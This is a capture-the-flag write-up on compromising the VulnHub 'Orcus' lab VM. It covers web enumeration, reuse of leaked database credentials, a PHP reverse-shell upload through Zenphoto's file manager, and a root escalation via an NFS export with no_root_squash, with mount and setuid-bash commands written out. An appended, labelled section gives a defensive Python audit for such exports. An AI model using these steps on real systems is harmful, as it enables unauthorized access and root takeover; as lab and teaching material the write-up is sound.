Enough with the philosophical yadda yadda.
First I fired up nmap and, as in the previous series, a gazillion services were running.
I went straight to port 80 and fired up nikto, which gave me a mouthful of interesting folders and web apps to follow up on. I also fired up dirb to see if I could find any extra folders.
There are so many seemingly vulnerable or actually vulnerable web apps, especially in the /external/ directory, that I'll never know for sure, so naturally I spent a long time here (so many wild goose chases).
At the URL http://172.16.94.136/backups/ I downloaded SimplePHPQuiz-Backupz.tar.gz but didn't have the permissions to download ssh-creds.bak. I somehow already knew it wouldn't amount to much. I extracted the folder, went to the configs folder and found database credentials:
```php
<?php
// Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if (mysqli_connect_error()) {
    echo "Could not connect to MySql. Please try again";
    exit();
}
?>
```
With this I immediately went to http://172.16.94.136/phpmyadmin/ and logged in. Boom!!
Now that we have credentials to phpMyAdmin, all that is left is to write a shell using MySQL, browse to it and get a shell.....
except it didn't happen that way, as the credentials didn't have write permission to the web root. They didn't even have the FILE privilege. The VM is loaded with a few databases, so I decided to go through them one by one to see if there were backends to other web apps that we hadn't found in the enumeration phase. We were rewarded with the /zenphoto/ folder, an app that was missed by all my scanning and web brute-forcing attempts. I browsed to it and had to install it first. I used the credentials from SimplePHPQuiz-Backupz.tar.gz and successfully installed it.
At this point the plan was to find a place to upload a webshell and get a reverse connection. I did this as follows:
Go to the Upload tab --> click Files (elFinder) --> Zen photodata, right-click on the pane on the right, click "create new text" and then paste in everyone's favourite php-reverse-shell.
After pasting it, right-click, choose Edit and change the file extension to .php, then right-click again and click Open (remember to have set up a netcat listener first). Then we get a limited reverse shell.
With the first flag in the bag, let's try to root this box. It took me a while to root it. I kept going away and trying privilege escalation exploits, until this morning, when I came back to my nmap scans and found this:
```
2049/tcp open nfs_acl 2-3 (RPC #100227)
```
I wonder why that didn't stand out to me in the first place. I quickly ran showmount:
```
root@kali:/tmp# showmount -e 172.16.94.136
Export list for 172.16.94.136:
/tmp *
```
I then checked the /etc/exports file and found that the NFS share was configured with no_root_squash:
```
www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)
```
On our Kali box, we mount the share:
```
root@kali:~# rm -rf /mnt/orcus/
root@kali:~# mkdir /mnt/orcus
root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus
root@kali:~# touch /mnt/orcus/rooter
root@kali:~# chmod 777 /mnt/orcus/rooter
```
On our limited shell on Orcus we copy the bash binary over our newly created, world-writable /tmp/rooter:
```
www-data@Orcus:/$ cp /bin/bash /tmp/rooter
```
We head back to our Kali box and set the setuid bit on the /tmp/rooter file (shell):
```
root@kali:~# chmod 4777 /mnt/orcus/rooter
```
We head into the /tmp folder, check to make sure the bit has been set, and then execute rooter with the -p option to preserve the privileges, which gets us root. :-)
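The host-side checks a defender would run against this misconfiguration, as an added example that is not part of the original write-up: a small Python audit that parses /etc/exports in the layout exports(5) uses, flags rw exports carrying no_root_squash (worst when offered to every client, `*`), and lists setuid/setgid files under an exported directory, which is exactly the footprint the rooter trick leaves behind. The exports text is a constructed sample based on the Orcus file above.

```python
import os
import re
import stat

# Constructed sample: the Orcus export from above plus a tighter one for contrast.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/tmp *(rw,no_root_squash)
/srv/homes 10.0.0.0/24(rw,sync,root_squash,no_subtree_check)
"""

def parse_exports(text: str) -> list[dict]:
    """Return one record per (path, client) pair with its option list."""
    records = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:        # no client given means everyone
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", client)
            host, opts = m.group(1) or "*", m.group(2) or ""
            records.append({"path": path, "client": host,
                            "options": [o for o in opts.split(",") if o]})
    return records

def risky_exports(text: str) -> list[str]:
    """Flag rw exports with no_root_squash: a remote root keeps uid 0 on the
    server, so anything it writes (e.g. a setuid binary) stays root-owned."""
    findings = []
    for r in parse_exports(text):
        if "no_root_squash" in r["options"] and "rw" in r["options"]:
            sev = "HIGH" if r["client"] == "*" else "MEDIUM"
            findings.append(f"{sev}: {r['path']} rw,no_root_squash to {r['client']}")
    return findings

def setuid_files(directory: str) -> list[str]:
    """List setuid/setgid regular files under an exported directory; a
    root-owned setuid shell in a world-writable export is the 'rooter' above."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)
```

Run `risky_exports(open("/etc/exports").read())` on the server and `setuid_files("/tmp")` on each exported path; a mount option of `nosuid` on the client side, or `root_squash` on the server, removes the escalation path the write-up used.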
It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and of course g0tmi1k and the whole VulnHub community who keep the war games coming.